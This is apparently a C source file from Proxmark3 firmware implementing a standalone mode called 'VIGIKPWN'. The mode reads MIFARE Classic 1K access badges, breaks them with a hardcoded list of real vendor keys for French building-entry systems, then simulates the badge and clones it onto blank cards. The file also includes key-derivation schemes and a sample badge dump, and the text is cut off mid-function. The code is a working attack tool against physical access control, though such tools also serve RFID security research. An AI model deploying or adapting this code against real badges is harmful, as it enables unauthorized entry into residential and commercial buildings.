//----------------------------------------------------------------------------- // Colin Brigato, 2016, 2017, 2018, 2019 // Christian Herrmann, 2017 // // This code is licensed to you under the terms of the GNU GPL, version 2 or, // at your option, any later version. See the LICENSE.txt file for the text of // the license. //----------------------------------------------------------------------------- // main code for HF Mifare aka ColinRun by Colin Brigato //----------------------------------------------------------------------------- #include "standalone.h" // standalone definitions #include "hf_colin.h" #include "proxmark3_arm.h" #include "appmain.h" #include "fpgaloader.h" #include "dbprint.h" #include "ticks.h" #include "util.h" #include "commonutil.h" #include "BigBuf.h" #include "iso14443a.h" #include "mifareutil.h" #include "mifaresim.h" #include "vtsend.h" #include "spiffs.h" #include "frozen.h" #define MF1KSZ 1024 #define MF1KSZSIZE 64 #define AUTHENTICATION_TIMEOUT 848 #define HFCOLIN_LASTTAG_SYMLINK "hf_colin/lasttag.bin" #define HFCOLIN_SCHEMAS_JSON "hf_colin/schemas.json" /* Example jsonconfig file schemas.json : (array !) [{ "name": "UrmetCaptive", "trigger": "0x8829da9daf76", "keysA": [ "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76" ], "keysB": [ "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76", "0x8829da9daf76" ] },{ "name": "Noralsy", ... ] */ static uint8_t cjuid[10]; static uint32_t cjcuid; static iso14a_card_select_t p_card; static int currline; static int currfline; static int curlline; // TODO : Implement fast read of KEYS like in RFIdea // also http://ext.delaat.net/rp/2015-2016/p04/report.pdf // Colin's VIGIKPWN sniff/simulate/clone repeat routine for HF Mifare static const uint8_t is_hex[] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 0, 0, 0, 0, 0, 0, 0, 11, 12, 13, 14, 15, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 12, 13, 14, 15, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 }; static uint64_t hex2i(const char *s) { uint64_t val = 0; if (s == NULL || s[0] == 0) return 0; if (s[1] == 'x') s += 2; else if (*s == 'x') s++; while (is_hex[(uint8_t)*s]) val = (val << 4) | (is_hex[(uint8_t) * (s++)] - 1); return val; } /*char *noralsy2test = "{\"name\":\"noralsy2\",\"trigger\":\"0x414C41524F4E\",\"keysA\":[\"0x414C41524F4E\",\"0x414C41524F4E\"," "\"0x414C41524F4E\"," "\"0x414C41524F4E\",\"0x414C41524F4E\",\"0x414C41524F4E\",\"0x414C41524F4E\",\"0x414C41524F4E\"," "\"0x414C41524F4E\",\"0x414C41524F4E\"," "\"0x414C41524F4E\",\"0x414C41524F4E\",\"0x414C41524F4E\",\"0x414C41524F4E\",\"0x414C41524F4E\"," "\"0x414C41524F4E\"],\"keysB\":[" "\"0x424C41524F4E\",\"0x424C41524F4E\",\"0x424C41524F4E\",\"0x424C41524F4E\",\"0x424C41524F4E\"," "\"0x424C41524F4E\",\"0x424C41524F4E\"," "\"0x424C41524F4E\",\"0x424C41524F4E\",\"0x424C41524F4E\",\"0x424C41524F4E\",\"0x424C41524F4E\"," "\"0x424C41524F4E\",\"0x424C41524F4E\"," "\"0x424C41524F4E\",\"0x424C41524F4E\"]}";*/ /*char *urmetcaptive2test = "{\"name\":\"urmetcaptive2\",\"trigger\":\"0x8829da9daf76\",\"keysA\":[\"0x8829da9daf76\",\"0x8829da9daf76\"," "\"0x8829da9daf76\"," "\"0x8829da9daf76\",\"0x8829da9daf76\",\"0x8829da9daf76\",\"0x8829da9daf76\",\"0x8829da9daf76\"," "\"0x8829da9daf76\",\"0x8829da9daf76\"," "\"0x8829da9daf76\",\"0x8829da9daf76\",\"0x8829da9daf76\",\"0x8829da9daf76\",\"0x8829da9daf76\"," "\"0x8829da9daf76\"],\"keysB\":[" "\"0x8829da9daf76\",\"0x8829da9daf76\",\"0x8829da9daf76\",\"0x8829da9daf76\",\"0x8829da9daf76\"," "\"0x8829da9daf76\",\"0x8829da9daf76\"," "\"0x8829da9daf76\",\"0x8829da9daf76\",\"0x8829da9daf76\",\"0x8829da9daf76\",\"0x8829da9daf76\"," "\"0x8829da9daf76\",\"0x8829da9daf76\"," "\"0x8829da9daf76\",\"0x8829da9daf76\"]}";*/ typedef struct MFC1KSchema { uint8_t name[32]; uint64_t trigger; uint64_t keysA[16]; uint64_t keysB[16]; } MFC1KSchema; #define MAX_SCHEMAS 4 static void scan_keys(const char *str, int len, uint64_t *user_data) { struct json_token t; int i; char ks[32]; for (i = 0; json_scanf_array_elem(str, len, "", i, &t) > 0; i++) { sprintf(ks, "%.*s", t.len, t.ptr); user_data[i] = hex2i(ks); } } static MFC1KSchema Schemas[MAX_SCHEMAS]; /*MFC1KSchema Noralsy = { .name = "Noralsy", .trigger = 0x414c41524f4e, .keysA = {0x414c41524f4e, 0x414c41524f4e, 0x414c41524f4e, 0x414c41524f4e, 0x414c41524f4e, 0x414c41524f4e, 0x414c41524f4e, 0x414c41524f4e, 0x414c41524f4e, 0x414c41524f4e, 0x414c41524f4e, 0x414c41524f4e, 0x414c41524f4e, 0x414c41524f4e, 0x414c41524f4e, 0x414c41524f4e}, .keysB = {0x424c41524f4e, 0x424c41524f4e, 0x424c41524f4e, 0x424c41524f4e, 0x424c41524f4e, 0x424c41524f4e, 0x424c41524f4e, 0x424c41524f4e, 0x424c41524f4e, 0x424c41524f4e, 0x424c41524f4e, 0x424c41524f4e, 0x424c41524f4e, 0x424c41524f4e, 0x424c41524f4e, 0x424c41524f4e}}; MFC1KSchema InfiHexact = {.name = "Infineon/Hexact", .trigger = 0x484558414354, .keysA = {0x484558414354, 0x484558414354, 0x484558414354, 0x484558414354, 0x484558414354, 0x484558414354, 0x484558414354, 0x484558414354, 0x484558414354, 0x484558414354, 0x484558414354, 0x484558414354, 0x484558414354, 0x484558414354, 0x484558414354, 0x484558414354}, .keysB = {0xa22ae129c013, 0x49fae4e3849f, 0x38fcf33072e0, 0x8ad5517b4b18, 0x509359f131b1, 0x6c78928e1317, 0xaa0720018738, 0xa6cac2886412, 0x62d0c424ed8e, 0xe64a986a5d94, 0x8fa1d601d0a2, 0x89347350bd36, 0x66d2b7dc39ef, 0x6bc1e1ae547d, 0x22729a9bd40f}}; */ /*MFC1KSchema UrmetCaptive = { .name = "Urmet Captive", .trigger = 0x8829da9daf76, .keysA = {0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76}, .keysB = {0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76, 0x8829da9daf76}}; */ static int total_schemas = 0; static void add_schema(MFC1KSchema *p, MFC1KSchema a, int *schemas_counter) { if (*schemas_counter < MAX_SCHEMAS) { p[*schemas_counter] = a; *schemas_counter += 1; } } /* static void delete_schema(MFC1KSchema *p, int *schemas_counter, int index) { if (*schemas_counter > 0 && index < *schemas_counter && index > -1) { int last_index = *schemas_counter - 1; for (int i = index; i < last_index; i++) { p[i] = p[i + 1]; } *schemas_counter -= 1; } } */ static void cjSetCursFRight(void) { vtsend_cursor_position(NULL, 98, (currfline)); currfline++; } static void cjSetCursRight(void) { vtsend_cursor_position(NULL, 59, (currline)); currline++; } static void cjSetCursLeft(void) { vtsend_cursor_position(NULL, 0, (curlline)); curlline++; } static void cjTabulize(void) { DbprintfEx(FLAG_RAWPRINT, "\t\t\t"); } static char *ReadSchemasFromSPIFFS(char *filename) { SpinOff(0); int changed = rdv40_spiffs_lazy_mount(); uint32_t size = size_in_spiffs((char *)filename); uint8_t *mem = BigBuf_malloc(size); rdv40_spiffs_read_as_filetype((char *)filename, (uint8_t *)mem, size, RDV40_SPIFFS_SAFETY_SAFE); if (changed) { rdv40_spiffs_lazy_unmount(); } SpinOff(0); return (char *)mem; } static void add_schemas_from_json_in_spiffs(char *filename) { char *jsonfile = ReadSchemasFromSPIFFS((char *)filename); int i, len = strlen(jsonfile); struct json_token t; for (i = 0; json_scanf_array_elem(jsonfile, len, "", i, &t) > 0; i++) { char *tmpname; char *tmptrigger; MFC1KSchema tmpscheme; json_scanf(t.ptr, t.len, "{ name:%Q, trigger:%Q, keysA:%M, keysB:%M}", &tmpname, &tmptrigger, scan_keys, &tmpscheme.keysA, scan_keys, &tmpscheme.keysB); memcpy(tmpscheme.name, tmpname, 32); tmpscheme.trigger = hex2i(tmptrigger); add_schema(Schemas, tmpscheme, &total_schemas); DbprintfEx(FLAG_NEWLINE, "Schema loaded : %s", tmpname); cjSetCursLeft(); } } static void ReadLastTagFromFlash(void) { SpinOff(0); LED_A_ON(); LED_B_ON(); LED_C_ON(); LED_D_ON(); uint16_t len = 1024; size_t size = len; DbprintfEx(FLAG_NEWLINE, "Button HELD ! Using LAST Known TAG for Simulation..."); cjSetCursLeft(); uint8_t *mem = BigBuf_malloc(size); // this one will handle filetype (symlink or not) and resolving by itself rdv40_spiffs_read_as_filetype((char *)HFCOLIN_LASTTAG_SYMLINK, (uint8_t *)mem, len, RDV40_SPIFFS_SAFETY_SAFE); // copy 64blocks (16bytes) starting w block0, to emulator mem. emlSetMem(mem, 0, 64); DbprintfEx(FLAG_NEWLINE, "[OK] Last tag recovered from FLASHMEM set to emulator"); cjSetCursLeft(); SpinOff(0); return; } void WriteTagToFlash(uint32_t uid, size_t size) { SpinOff(0); LED_A_ON(); LED_B_ON(); LED_C_ON(); LED_D_ON(); uint32_t len = size; uint8_t data[(size * (16 * 64)) / 1024]; emlGetMem(data, 0, (size * 64) / 1024); char dest[SPIFFS_OBJ_NAME_LEN]; uint8_t buid[4]; num_to_bytes(uid, 4, buid); sprintf(dest, "hf_colin/mf_%02x%02x%02x%02x.bin", buid[0], buid[1], buid[2], buid[3]); // TODO : by using safe function for multiple writes we are both breaking cache mecanisms and making useless and // unoptimized mount operations we should manage at out level the mount status before and after the whole // standalone mode rdv40_spiffs_write((char *)dest, (uint8_t *)data, len, RDV40_SPIFFS_SAFETY_SAFE); // lastag will only contain filename/path to last written tag file so we don't loose time or space. rdv40_spiffs_make_symlink((char *)dest, (char *)HFCOLIN_LASTTAG_SYMLINK, RDV40_SPIFFS_SAFETY_SAFE); DbprintfEx(FLAG_NEWLINE, "[OK] TAG WRITTEN TO FLASH !"); cjSetCursLeft(); SpinOff(0); return; } void ModInfo(void) { DbpString(" HF Mifare ultra fast sniff/sim/clone - aka VIGIKPWN (Colin Brigato)"); } void RunMod(void) { StandAloneMode(); FpgaDownloadAndGo(FPGA_BITSTREAM_HF); Dbprintf(">> HF Mifare ultra fast sniff/sim/clone a.k.a VIGIKPWN Started <<"); // turn off all debugging. DBGLEVEL = DBG_NONE; // add_schema(Schemas, Noralsy, &total_schemas); // add_schema(Schemas, InfiHexact, &total_schemas); // add_schema_from_json_in_spiffs((char *)HFCOLIN_URMETCAPTIVE_JSON); // add_schema(Schemas, UrmetCaptive, &total_schemas); currline = 20; curlline = 20; currfline = 24; memset(cjuid, 0, sizeof(cjuid)); cjcuid = 0; uint8_t sectorsCnt = (MF1KSZ / MF1KSZSIZE); uint64_t key64; // Defines current key uint8_t *keyBlock; // Where the keys will be held in memory. /* VIGIK EXPIRED DUMP FOR STUDY Sector 0 121C7F730208040001FA33F5CB2D021D 44001049164916491649000000000000 00000000000000000000000000000000 A0A1A2A3A4A579678800010203040506 Sector 1 0F000000000000000000000000000000 AA0700002102080000740C110600AF13 000000000000000001740C1108220000 314B4947495679678800010203040506 Sector 2 24E572B923A3D243B402D60CAB576956 216D6501FC8618B6C426762511AC2DEE 25BF4CEC3618D0BAB3A6E9210D887746 314B4947495679678800010203040506 Sector 3 0FBC41A5D95398E76A1B2029E8EA9735 088BA2CE732653D0C1147596AFCF94D7 77B4D91F0442182273A29DEAF7A2D095 314B4947495679678800010203040506 Sector 4 4CEE715866E508CDBC95C640EC9D1E58 E800457CF8B079414E1B45DD3E6C9317 77B4D91F0442182273A29DEAF7A2D095 314B4947495679678800010203040506 010203040506 0 Sector 5-0F 00000000000000000000000000000000 00000000000000000000000000000000 00000000000000000000000000000000 FFFFFFFFFFFFFF078069FFFFFFFFFFFF KEY A : 1KGIV ; ACCBITS : 796788[00]+VALUE */ // ---------------------------- // Set of keys to be used. // This should cover ~98% of // French VIGIK system @2017 // ---------------------------- const uint64_t mfKeys[] = { 0xffffffffffff, // TRANSPORTS 0x000000000000, // Blankkey 0x484558414354, // INFINEONON A / 0F SEC B / INTRATONE / HEXACT... 0x414c41524f4e, // ALARON NORALSY 0x424c41524f4e, // BLARON NORALSY 0x4a6352684677, // COMELIT A General Key / 08 [2] 004 0x536653644c65, // COMELIT B General Key / 08 [2] 004 0x8829da9daf76, // URMET CAPTIV IF A => ALL A/B / BTICINO 0x314B49474956, // "1KIGIV" VIGIK'S SERVICE BADGE A KEY 0xa0a1a2a3a4a5, // PUBLIC BLOC0 BTICINO MAD ACCESS 0x021209197591, // BTCINO UNDETERMINED SPREAKD 0x01->0x13 key 0x010203040506, // VIGIK's B Derivative 0xb0b1b2b3b4b5, // NA DERIVATE B # 1 0xaabbccddeeff, // NA DERIVATE B # 1 0x4d3a99c351dd, // NA DERIVATE B # 1 0x1a982c7e459a, // NA DERIVATE B # 1 0xd3f7d3f7d3f7, // NA DERIVATE B # 1 0x714c5c886e97, // NA DERIVATE B # 1 0x587ee5f9350f, // NA DERIVATE B # 1 0xa0478cc39091, // NA DERIVATE B # 1 0x533cb6c723f6, // NA DERIVATE B # 1 0x8fd0a4f256e9, // NA DERIVATE B # 1 0xa22ae129c013, // INFINEON B 00 0x49fae4e3849f, // INFINEON B 01 0x38fcf33072e0, // INFINEON B 02 0x8ad5517b4b18, // INFINEON B 03 0x509359f131b1, // INFINEON B 04 0x6c78928e1317, // INFINEON B 05 0xaa0720018738, // INFINEON B 06 0xa6cac2886412, // INFINEON B 07 0x62d0c424ed8e, // INFINEON B 08 0xe64a986a5d94, // INFINEON B 09 0x8fa1d601d0a2, // INFINEON B 0A 0x89347350bd36, // INFINEON B 0B 0x66d2b7dc39ef, // INFINEON B 0C 0x6bc1e1ae547d, // INFINEON B 0D 0x22729a9bd40f // INFINEON B 0E }; // Can remember something like that in case of Bigbuf keyBlock = BigBuf_malloc(ARRAYLEN(mfKeys) * 6); int mfKeysCnt = ARRAYLEN(mfKeys); for (int mfKeyCounter = 0; mfKeyCounter < mfKeysCnt; mfKeyCounter++) { num_to_bytes(mfKeys[mfKeyCounter], 6, (uint8_t *)(keyBlock + mfKeyCounter * 6)); } // TODO : remember why we actually had need to initialize this array in such specific case // and why not a simple memset abuse to 0xffize the whole space in one go ? // uint8_t foundKey[2][40][6]; //= [ {0xff} ]; /* C99 abusal 6.7.8.21 uint8_t foundKey[2][40][6]; for (uint16_t i = 0; i < 2; i++) { for (uint16_t sectorNo = 0; sectorNo < sectorsCnt; sectorNo++) { foundKey[i][sectorNo][0] = 0xFF; foundKey[i][sectorNo][1] = 0xFF; foundKey[i][sectorNo][2] = 0xFF; foundKey[i][sectorNo][3] = 0xFF; foundKey[i][sectorNo][4] = 0xFF; foundKey[i][sectorNo][5] = 0xFF; } } int key = -1; bool err = 0; bool trapped = 0; bool allKeysFound = true; uint32_t size = mfKeysCnt; // banner: vtsend_reset(NULL); DbprintfEx(FLAG_NEWLINE, "\r\n%s", clearTerm); DbprintfEx(FLAG_NEWLINE, "%s%s%s", _XCYAN_, sub_banner, _XWHITE_); DbprintfEx(FLAG_NEWLINE, "%s>>%s C.J.B's MifareFastPwn Started\r\n", _XRED_, _XWHITE_); currline = 20; curlline = 20; currfline = 24; cjSetCursLeft(); add_schemas_from_json_in_spiffs((char *)HFCOLIN_SCHEMAS_JSON); failtag: vtsend_cursor_position_save(NULL); vtsend_set_attribute(NULL, 1); vtsend_set_attribute(NULL, 5); DbprintfEx(FLAG_NEWLINE, "\t\t\t[ Waiting For Tag ]"); vtsend_set_attribute(NULL, 0); iso14443a_setup(FPGA_HF_ISO14443A_READER_LISTEN); SpinOff(50); LED_A_ON(); uint8_t ticker = 0; while (!iso14443a_select_card(cjuid, &p_card, &cjcuid, true, 0, true)) { WDT_HIT(); ticker++; if (ticker % 64 == 0) { LED_A_INV(); } if (BUTTON_HELD(10) == BUTTON_HOLD) { WDT_HIT(); DbprintfEx(FLAG_NEWLINE, "\t\t\t[ READING FLASH ]"); ReadLastTagFromFlash(); goto readysim; } } SpinOff(50); FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); vtsend_cursor_position_restore(NULL); DbprintfEx(FLAG_NEWLINE, "\t\t\t%s[ GOT a Tag ! ]%s", _XGREEN_, _XWHITE_); cjSetCursLeft(); DbprintfEx(FLAG_NEWLINE, "\t\t\t `---> Breaking keys ---->"); cjSetCursRight(); DbprintfEx(FLAG_NEWLINE, "\t%sGOT TAG :%s %08x%s", _XRED_, _XCYAN_, cjcuid, _XWHITE_); if (cjcuid == 0) { cjSetCursLeft(); DbprintfEx(FLAG_NEWLINE, "%s>>%s BUG: 0000_CJCUID! Retrying...", _XRED_, _XWHITE_); SpinErr(LED_A, 100, 8); goto failtag; } SpinOff(50); LED_B_ON(); cjSetCursRight(); DbprintfEx(FLAG_NEWLINE, "--------+--------------------+-------"); cjSetCursRight(); DbprintfEx(FLAG_NEWLINE, " SECTOR | KEY | A/B "); cjSetCursRight(); DbprintfEx(FLAG_NEWLINE, "--------+--------------------+-------"); uint32_t start_time = GetTickCount(); uint32_t delta_time = 0; // --------------------------------------------------------------------------- // WE SHOULD FIND A WAY TO GET UID TO AVOID THIS "TESTRUN" // -------------------------------------------------------- // + HERE IS TO BE THOUGHT AS ONLY A KEY SHOULD BE CHECK // `-+ THEN WE FILL EMULATOR WITH KEY // `-+ WHEN WE FILL EMULATOR CARD WITH A KEY // `-+ IF THERE IS ANY FAIL DURING ANY POINT, WE START BACK CHECKING B KEYS // `-+ THEN FILL EMULATOR WITH B KEEY // `-+ THEN EMULATOR WITH CARD WITH B KEY // `-+ IF IT HAS FAILED OF ANY OF SORT THEN WE ARE MARRON LIKE POMALO. // ---------------------------------------------------------------------------- // AN EVEN BETTER IMPLEMENTATION IS TO CHECK EVERY KEY FOR SECTOR 0 KEY A // THEN IF FOUND CHECK THE SAME KEY FOR NEXT SECTOR ONLY KEY A // THEN IF FAIL CHECK EVERY SECTOR A KEY FOR EVERY OTHER KEY BUT NOT THE BLOCK // 0 KEY // THEN TRY TO READ B KEYS FROM KNOWN A KEYS // IF FAIL, CHECK SECTOR 0 B KEY WITH SECTOR 0 A KEY // THEN IF FOUND CHECK EVERY SECTOR FOR SAME B KEY // ELSE IF FAIL CHECK EVERY KEY FOR SECTOR 0 KEY B // THEN IF FOUND CHECK SAME KEY FOR ONLY NEXT SECTOR KEY B (PROBABLE A KEY IS // SAME FOR EVERY SECTOR AND B KEY IS SAME FOR EVERY SECTOR WITH JUST A vs B // DERIVATION // THEN IF B KEY IS NOT OF THIS SCHEME CHECK EVERY REMAINING B KEYED SECTOR // WITH EVERY REMAINING KEYS, BUT DISCARDING ANY DEFAULT TRANSPORT KEYS. // ----------------------------------------------------------------------------- // also we could avoid first UID check for every block // then let's expose this optimal case of well known vigik schemes : for (uint8_t type = 0; type < 2 && !err && !trapped; type++) { for (int sec = 0; sec < sectorsCnt && !err && !trapped; ++sec) { key = cjat91_saMifareChkKeys(sec * 4, type, NULL, size, &keyBlock[0], &key64); if (key == -1) { err = 1; allKeysFound = false; // used in portable imlementation on microcontroller: it reports back the fail and open the // standalone lock reply_old(CMD_CJB_FSMSTATE_MENU, 0, 0, 0, 0, 0); break; } else if (key == -2) { err = 1; // Can't select card. allKeysFound = false; // reply_old(CMD_CJB_FSMSTATE_MENU, 0, 0, 0, 0, 0); break; } else { /* BRACE YOURSELF : AS LONG AS WE TRAP A KNOWN KEY, WE STOP CHECKING AND ENFORCE KNOWN SCHEMES */ // uint8_t tosendkey[13]; char tosendkey[13]; num_to_bytes(key64, 6, foundKey[type][sec]); cjSetCursRight(); DbprintfEx(FLAG_NEWLINE, "SEC: %02x ; KEY : %012" PRIx64 " ; TYP: %i", sec, key64, type); /*reply_old(CMD_CJB_INFORM_CLIENT_KEY, 12, sec, type, tosendkey, 12);*/ for (int i = 0; i < total_schemas; i++) { if (key64 == Schemas[i].trigger) { cjSetCursLeft(); DbprintfEx(FLAG_NEWLINE, "%s>>>>>>>>>>>>!*STOP*!<<<<<<<<<<<<<<%s", _XRED_, _XWHITE_); cjSetCursLeft(); DbprintfEx(FLAG_NEWLINE, " .TAG SEEMS %sDETERMINISTIC%s. ", _XGREEN_, _XWHITE_); cjSetCursLeft(); DbprintfEx(FLAG_NEWLINE, "%sDetected: %s %s%s", _XORANGE_, _XCYAN_, Schemas[i].name, _XWHITE_); cjSetCursLeft(); DbprintfEx(FLAG_NEWLINE, "...%s[%sKey_derivation_schemeTest%s]%s...", _XYELLOW_, _XGREEN_, _XYELLOW_, _XGREEN_); cjSetCursLeft(); DbprintfEx(FLAG_NEWLINE, "%s>>>>>>>>>>>>!*DONE*!<<<<<<<<<<<<<<%s", _XGREEN_, _XWHITE_); uint16_t t = 0; for (uint16_t s = 0; s < sectorsCnt; s++) { num_to_bytes(Schemas[i].keysA[s], 6, foundKey[t][s]); sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][s][0], foundKey[t][s][1], foundKey[t][s][2], foundKey[t][s][3], foundKey[t][s][4], foundKey[t][s][5]); cjSetCursRight(); DbprintfEx(FLAG_NEWLINE, "SEC: %02x ; KEY : %s ; TYP: %d", s, tosendkey, t); } t = 1; for (uint16_t s = 0; s < sectorsCnt; s++) { num_to_bytes(Schemas[i].keysB[s], 6, foundKey[t][s]); sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][s][0], foundKey[t][s][1], foundKey[t][s][2], foundKey[t][s][3], foundKey[t][s][4], foundKey[t][s][5]); cjSetCursRight(); DbprintfEx(FLAG_NEWLINE, "SEC: %02x ; KEY : %s ; TYP: %d", s, tosendkey, t); } trapped = 1; break; } } /* etc etc for testing schemes quick schemes */ } } } if (!allKeysFound) { cjSetCursLeft(); cjTabulize(); DbprintfEx(FLAG_NEWLINE, "%s[ FAIL ]%s\r\n->did not found all the keys :'(", _XRED_, _XWHITE_); cjSetCursLeft(); SpinErr(LED_B, 100, 8); SpinOff(100); return; } // Settings keys to emulator emlClearMem(); uint8_t mblock[16]; for (uint8_t sectorNo = 0; sectorNo < sectorsCnt; sectorNo++) { emlGetMem(mblock, FirstBlockOfSector(sectorNo) + NumBlocksPerSector(sectorNo) - 1, 1); for (uint8_t t = 0; t < 2; t++) { memcpy(mblock + t * 10, foundKey[t][sectorNo], 6); } emlSetMem(mblock, FirstBlockOfSector(sectorNo) + NumBlocksPerSector(sectorNo) - 1, 1); } cjSetCursLeft(); DbprintfEx(FLAG_NEWLINE, "%s>>%s Setting Keys->Emulator MEM...[%sOK%s]", _XYELLOW_, _XWHITE_, _XGREEN_, _XWHITE_); // filling TAG to emulator int filled; cjSetCursLeft(); DbprintfEx(FLAG_NEWLINE, "%s>>%s Filling Emulator <- from A keys...", _XYELLOW_, _XWHITE_); filled = e_MifareECardLoad(sectorsCnt, 0); if (filled != PM3_SUCCESS) { cjSetCursLeft(); DbprintfEx(FLAG_NEWLINE, "%s>>%s W_FAILURE ! %sTrying fallback B keys....", _XRED_, _XORANGE_, _XWHITE_); // no trace, no dbg filled = e_MifareECardLoad(sectorsCnt, 1); if (filled != PM3_SUCCESS) { cjSetCursLeft(); DbprintfEx(FLAG_NEWLINE, "FATAL:EML_FALLBACKFILL_B"); SpinErr(LED_C, 100, 8); SpinOff(100); return; } } delta_time = GetTickCountDelta(start_time); cjSetCursLeft(); DbprintfEx(FLAG_NEWLINE, "%s>>%s Time for VIGIK break :%s%dms%s", _XGREEN_, _XWHITE_, _XYELLOW_, delta_time, _XWHITE_); vtsend_cursor_position_save(NULL); vtsend_set_attribute(NULL, 1); vtsend_set_attribute(NULL, 5); cjTabulize(); DbprintfEx(FLAG_NEWLINE, "[ WRITING FLASH ]"); cjSetCursLeft(); cjSetCursLeft(); WriteTagToFlash(cjcuid, 1024); readysim: cjSetCursLeft(); DbprintfEx(FLAG_NEWLINE, "-> We launch Emulation ->"); cjSetCursLeft(); DbprintfEx(FLAG_NEWLINE, "%s!> HOLD ON : %s When you'll click, simm will stop", _XRED_, _XWHITE_); cjSetCursLeft(); DbprintfEx(FLAG_NEWLINE, "Then %s immediately %s we'll try to %s dump our emulator state%s \r\nin a %s chinese tag%s", _XRED_, _XWHITE_, _XYELLOW_, _XWHITE_, _XCYAN_, _XWHITE_); cjSetCursLeft(); cjSetCursLeft(); cjTabulize(); DbprintfEx(FLAG_NEWLINE, "[ SIMULATION ]"); vtsend_set_attribute(NULL, 0); SpinOff(100); LED_C_ON(); /* uint16_t flags = 0; switch (p_card.uidlen) { case 10: flags = FLAG_10B_UID_IN_DATA; break; case 7: flags = FLAG_7B_UID_IN_DATA; break; case 4: flags = FLAG_4B_UID_IN_DATA; break; default: flags = FLAG_UID_IN_EMUL; break; } // Use UID, SAK, ATQA from EMUL, if uid not defined if ((flags & (FLAG_4B_UID_IN_DATA | FLAG_7B_UID_IN_DATA | FLAG_10B_UID_IN_DATA)) == 0) { flags |= FLAG_UID_IN_EMUL; } flags |= FLAG_MF_1K; if ((flags & (FLAG_4B_UID_IN_DATA | FLAG_7B_UID_IN_DATA | FLAG_10B_UID_IN_DATA)) == 0) { flags |= FLAG_UID_IN_EMUL; } flags = 0x10; */ uint16_t flags = FLAG_UID_IN_EMUL; DbprintfEx(FLAG_NEWLINE, "\n\n\n\n\n\n\n\nn\n\nn\n\n\nflags: %d (0x%02x)", flags, flags); cjSetCursLeft(); SpinOff(1000); Mifare1ksim(flags, 0, cjuid, 0, 0); LED_C_OFF(); SpinOff(50); vtsend_cursor_position_restore(NULL); DbprintfEx(FLAG_NEWLINE, "[ SIMUL ENDED ]%s", _XGREEN_, _XWHITE_); cjSetCursLeft(); DbprintfEx(FLAG_NEWLINE, "<- We're out of Emulation"); // END SIM cjSetCursLeft(); DbprintfEx(FLAG_NEWLINE, "-> Trying a clone !"); saMifareMakeTag(); cjSetCursLeft(); vtsend_cursor_position_restore(NULL); DbprintfEx(FLAG_NEWLINE, "%s[ CLONED? ]", _XCYAN_); DbprintfEx(FLAG_NEWLINE, "-> End Cloning."); WDT_HIT(); // Debunk... cjSetCursLeft(); cjTabulize(); vtsend_set_attribute(NULL, 0); vtsend_set_attribute(NULL, 7); DbprintfEx(FLAG_NEWLINE, "- [ LA FIN ] -\r\n%s`-> You can take shell back :) ...", _XWHITE_); cjSetCursLeft(); vtsend_set_attribute(NULL, 0); SpinErr(LED_D, 100, 16); SpinDown(75); SpinOff(100); return; } /* Abusive microgain on original MifareECardLoad : * - *datain used as error return * - tracing is falsed */ int e_MifareECardLoad(uint32_t numofsectors, uint8_t keytype) { uint8_t numSectors = numofsectors; uint8_t keyType = keytype; struct Crypto1State mpcs = {0, 0}; struct Crypto1State *pcs; pcs = &mpcs; uint8_t dataoutbuf[16]; uint8_t dataoutbuf2[16]; iso14443a_setup(FPGA_HF_ISO14443A_READER_LISTEN); clear_trace(); set_tracing(false); bool isOK = true; if (!iso14443a_select_card(cjuid, &p_card, &cjcuid, true, 0, true)) { isOK = false; } for (uint8_t s = 0; isOK && s < numSectors; s++) { uint64_t ui64Key = emlGetKey(s, keyType); if (s == 0) { if (isOK && mifare_classic_auth(pcs, cjcuid, FirstBlockOfSector(s), keyType, ui64Key, AUTH_FIRST)) { break; } } else { if (isOK && mifare_classic_auth(pcs, cjcuid, FirstBlockOfSector(s), keyType, ui64Key, 